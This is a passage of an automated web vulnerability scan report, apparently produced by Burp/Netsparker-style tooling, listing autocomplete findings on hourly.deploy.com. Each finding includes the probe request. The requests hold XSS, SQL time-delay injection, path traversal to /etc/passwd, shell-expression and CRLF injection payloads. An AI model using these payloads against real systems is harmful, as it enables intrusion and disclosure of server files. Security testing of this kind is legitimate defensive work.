Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.225. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000C)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000c)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.226. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.227. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.228. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.229. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.230. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.231. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.232. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.233. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.234. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.235. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.236. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.237. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.238. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.239. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x00001C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x00001c)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.240. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.241. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
